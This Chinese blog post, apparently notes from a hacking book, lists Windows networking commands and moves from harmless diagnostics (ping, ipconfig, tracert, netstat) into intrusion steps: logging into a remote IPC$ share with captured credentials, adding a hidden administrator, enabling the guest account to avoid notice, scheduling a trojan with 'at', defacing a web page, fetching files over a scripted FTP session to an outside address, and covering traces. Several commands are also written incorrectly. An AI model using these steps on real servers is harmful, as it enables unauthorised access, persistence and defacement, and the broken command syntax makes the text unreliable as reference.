要接触黑客,首先要了解一些黑客常用的网络命令。黑客就是通过上系列网络命令来得知要进攻网站的重要信息。由于我现在用的这台计算机没有连入公网,所以部分命令就不能给大家截图演示了,把基本知识写出来,大家自己去演示吧!如有什么不懂的,可以在我博客下方留言。
【一】ping
主要功能:用来检查路由器是否能够到达某站点。
详细介绍:由于该命令的包长非常小 ,所以在网上传递的速度非常快,可以快速检测你要去的站点是否可以到达。如果执行ping命令不成功,刚可以预测故障出现的原因可能有以下几方面:网线是否连通、网络适配器是否正确、IP地址是否可以用等。如果执行PING命令成功了,可网络仍无法使用,那么问题很可能出现在网络系统的软件配置方面。ping成功也只能保证当前主机与目的主机存在一条连通的物理路径,它使用的格式为“ping IP地址(或主机名)”,如"ping www.baidu.com",这样就可以测试目前连接该网站的速度如何。
下面我们就讲解一些主要的参数:
● -t:让用户所在主机不断向目标主机发送数据。如:ping -t www.baidu.com
● -n count:指定要ping多少次,具体次数由后面的count来指定。如:ping -n 8 www.xing3.cn
● -1 size:指定发送到目标主机的数据包的大小。默认的数据包大小是32字节。如果我们想要指定数据包大小为100字节,格式为ping -1 100 www.baidu.com
【二】ipconfig
主要功能:显示用户所在主机内部的IP配置信息。
详细介绍:ipconfig程序采用Windows窗口的形式显示IP的具体的配置信息。如果ipconfig命令后面不跟任何参数直接运行,程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码,以及默认网关等。使用方法:首先单击【开始】,然后点击【运行】,在运行输入ipconfig命令,按下回车键就可以了。如果想知道更详细的信息,可以输入ipconfig/all命令。
【三】tracert
主要功能:判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。
详细介绍:这个应用程序主要用来显示数据包到达目的主机所经过的路径。该命令的使用格式是在DOS命令提示符或直接在“运行”对话框中输入如下命令:tracert 主机IP地址或主机名。
要是大家想要详细了解自己的计算机与目标主机之间传输路径信息,可以使用tracert命令来检测一下。具体步骤如下:首先单击【开始】,然后点击【运行】,直接输入“tracert www.baidu.com”命令,按回车键。
【四】netstat
主要功能:该命令可以让用户了解到自己的主机是怎样与Internet相连接的。
详情介绍:netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接详细信息,例如显示网络连接、路由表和网络接口信息,可以让用户知道目前总共有哪些网络正在运行。使用方法:在DOS命令提示符或直接在“运行”对话框中输入如下命令:netsta “参数”。
常用参数列表:
● -r:显示本机路由的内容,使我们可以直观地了解本机的路由。
● -s: 显示每个协议的使用状态(包括tcp,udp,ip)
● -n: 以数字形式显示地址和端口。
● -a: 显示所有主机的端口号
【五】net
如查你拥有某个IP的用户名和密码,那就用IPC$做边接吧!
假设我们得到的用户名是:xing3 密码是:xing3cn IP是:192.168.0.2
在DOS命令提示符下输入:c:\>net use \\192.168.0.2\ipc$ xing3cn /user:xing3
这时候就登录上来了,当我们要退出时,就要断开这个连接,命令为:c:\>net use \\192.168.0.2\ipc$ /del
我们创建一个用户:用户名为xing,密码为:123,命令为:c:\>net use xing 123 /add
通过命令把这个用户组加到管理员组中。命令为:c:\>net localgroup administrators xing /add
要把对方的C盘映射成本地的X盘。命令为:c:\>net use x: \\192.168.0.2\c$
将guest用户激活,guest是windows nt 的默认用户,通常这样不容易被发现。命令如下:c:\>net guest /active:yes
把一个用户密码改掉,这里guest的密码改为:xing3,其它用户也可以,只要有权限就行。c:\>net user guest 52hxf
通常我们也会通过net命令来查看目标服务器的时间:c:\>net time \\192.168.0.2
【六】at
一般入侵者入侵后都会留下后门,也就是种木马了。黑客把木马传了上去,怎么启动呢?这里需要at命令,这里假设黑客已经登录了那个服务器,并通过net time 命令查看了目档服务器时间。等到了23:12就可以连接对方的90号端口,这样就给对方种植了木马。
c:\>at \\192.168.0.2 23:12 srv.exe
【七】telnet
这个命令非常实用,它可以与远方做连接,不过正常情况下需要用户名、密码。输入 telnet ip,就可以在对方机器上运行命令了。
【八】copy
怎样把本地的文件复制到对方硬盘上去,需要建立好ipc$连接才有效。这里我们把本地C盘下的index.html复制到对方的C盘下。
命令为:c:\>copy c:\index.html \\192.168.0.2\c$\index.html
【九】set
如果黑客侵入了一台服务器,而且想要黑掉这台服务器,这时他需要用set命令。
【十】echo
echo是写入命令,">>"产生的内容将追加进文件中,">"刚将原文件内容覆盖。
如:c:\Inputpub\wwwroot>echo 星光博客>index.htm
c:\Inputpub\wwwroot>echo QQ:407445 >>index.htm
用这样简单的手段黑别人的服务器没有什么意思,我们可以用下面这种玩法:
c:\Inetpub\wwwroot>echo g3eek >>c:\g3eek.txt
c:\Inetpub\wwwroot>echo 521hxf >>c:g3eek.txt
c:\Inetpub\wwwroot>echo get index.htm c:\inetput\wwwroot\index.htm >>e:\g3eek.txt
c:\Inetpub\wwwroot>ftp -s:c:\g3eek.txt
ftp> open 202.97.175.21
等命令完成后,文件已经下载到你定的文件里了。
注意:取得文件后,请删除 g3eek.txt(如果不删除,很容易会给他人看到你的密码),用"del c:\g3eek.txt"
【十一】attrib
这个命令是设置文件属性用的,如果黑客想黑一个网站,而他的主页的文件属性设置了只读,想删除它也不行,有了这个命令训可以轻松解决这个问题了。例如:
-r这个参数是把index.htm的只读属性去掉
c:\Inetpub\wwwroot>attrib -r index.htm
+r这个参数是把index.htm的属性设成只读
c:\Inetpub\wwwroot>attrib +r index.htm
【十二】net start
是后一个命令了。启动服务器上的一些服务
我们可以用net start命令启动schedule
c:\Inetpub\wwwroot>net start schedule
启动服务器上的终端服务:
c:\Inetpub\wwwroot>net start termservice
打开服务器的net use服务
c:\>net start workstation
打开服务器的ipc共享
c:\Inetpub\wwwroot>net start lanmanserver
如果服务器上的共享关闭了,我们可打开共享
c:\Inetpub\wwwroot>net start server
再打开web的日志管理,方便我们对服务器进行管理。
c:\Inetpub\wwwroot>net start w3svc
如果服务器开放了ftp服务,我们还要打开ftp日志对ftp服务器进行管理。
c:\Intepub\wwwroot>net start msftpsvc
终于写完了,明天继续!
魁星的《防黑档案》学习笔记003
评论内容:发表评论不能请不要超过250字;发表评论请自觉遵守互联网相关政策法规。
